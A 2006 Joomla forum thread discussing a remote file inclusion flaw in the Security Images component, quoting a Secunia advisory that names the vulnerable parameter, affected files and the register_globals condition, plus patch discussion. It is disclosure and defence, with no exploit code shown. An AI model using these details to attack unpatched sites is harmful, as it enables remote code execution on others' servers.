The Joomla! Forum ™





Post new topic Reply to topic  [ 13 posts ] 
Author Message
PostPosted: Mon Jul 31, 2006 1:29 pm 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
Remote file include exploit is in the wild.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Last edited by RobS on Thu Aug 10, 2006 8:17 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Mon Jul 31, 2006 2:15 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
more specifics? ???


Top
 Profile  
 
PostPosted: Mon Jul 31, 2006 2:47 pm 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use.  I can only share that information with the projects developers, sorry :(

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Top
 Profile  
 
PostPosted: Mon Jul 31, 2006 4:28 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 10:40 pm
Posts: 466
Location: las vegas USA
TITLE:
Joomla Security Images Component File Inclusion

SECUNIA ADVISORY ID:
SA21260

VERIFY ADVISORY:
http://secunia.com/advisories/21260/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Security Images 3.x (component for Joomla)
http://secunia.com/product/11186/

DESCRIPTION:
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter is not
properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.

Affected files:
administrator/components/com_securityimages/configinsert.php
administrator/components/com_securityimages/lang.php

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 3.0.5. Other
version may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

PROVIDED AND/OR DISCOVERED BY:
Drago84

ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2083

----------------------------------------------------------------------

_________________
joomla 1.6 Türk destek sitesi http://www.joomlaturk.net/


Top
 Profile  
 
PostPosted: Tue Aug 01, 2006 6:09 am 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
Thanks all for the info... added to the official list.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Top
 Profile  
 
PostPosted: Tue Aug 01, 2006 6:26 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Nov 03, 2005 4:46 pm
Posts: 48
it seems to me that anyone who understands php could easily patch Security Images.

only 2 files are listed as liabilities....

and the fix suggested in this forum is to harden the call to
Code:
require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php");
by defining the absolute path:
Code:
define( 'YOURBASEPATH', dirname(__FILE__) );
 require_once( YOURBASEPATH . '/file_to_include.php' );


unfortunately, i don't know php well enough to apply this.

anyone?


Top
 Profile  
 
PostPosted: Tue Aug 01, 2006 8:50 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 16539
Version 3.06 has been brought out: http://forge.joomla.org/sf/projects/com_securityimages.

_________________
Joomla forum global moderator.

Have fun


Top
 Profile  
 
PostPosted: Tue Aug 01, 2006 10:14 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Jan 29, 2006 7:49 pm
Posts: 14
Location: Machynlleth, Mid-Wales, UK
wish i could get the new one to work :(

Using 3.0.6 and the latest Akobook version, but it just refuses to work.

Only can get the freecap plugin to appear - the other two just dont do anything - and even though it appears to work, when u submit the guestbook entry - having put the secuity word in, it doesnt work.

I thought that I was being dumb and that I hadnt realised it was case sensitive - but either I'm blind, or it really doesnt want to know.

I did wonder whether the hardening of the latest joomla but i'm not sure.

If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk

I really feel like never updating any component or Joomla itself again as something always goes wrong hehe

/rant ;)

Cheers
Nath.

_________________
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net


Top
 Profile  
 
PostPosted: Wed Aug 02, 2006 1:44 am 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
Nath - make sure you report this on the bug tracker on the forge's project pages.
Project devs do see these reports but may miss seeing forum posts.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Top
 Profile  
 
PostPosted: Wed Aug 02, 2006 5:31 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Jan 29, 2006 7:49 pm
Posts: 14
Location: Machynlleth, Mid-Wales, UK
Hi there

I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html

Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol

Cheers
Nath.

_________________
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net


Top
 Profile  
 
PostPosted: Wed Aug 02, 2006 10:44 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 26, 2005 10:13 pm
Posts: 410
Location: Spain
tarquel wrote:
Hi there

I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html

Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol

Cheers
Nath.


Hi Nath,

From Walter Cedric's wiki you are referred to http://developer.joomla.org/sf/sfmain/d ... rityimages.
So that's the place to go!  :)

_________________
My Extensions: JM-Recommend, JM-Credits, JM-Link Us (for J! 1.0.x). Find them in the 3rd Party Extensions Forum.
Joomla test installation: www.poraqui.net/joomla  User: test  Password: test


Top
 Profile  
 
PostPosted: Wed Aug 02, 2006 11:26 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Jan 29, 2006 7:49 pm
Posts: 14
Location: Machynlleth, Mid-Wales, UK
ahhhhh thats the one :)

Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps]

Cheers
Nath.

_________________
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net


Top
 Profile  
 
PostPosted: Thu Dec 20, 2007 4:36 pm 
I've been banned!

Joined: Wed Dec 19, 2007 10:36 pm
Posts: 21
Elpie wrote:
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use.  I can only share that information with the projects developers, sorry :(


tell me more.

_________________
smile


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 13 posts ] 



Who is online

Users browsing this forum: No registered users and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group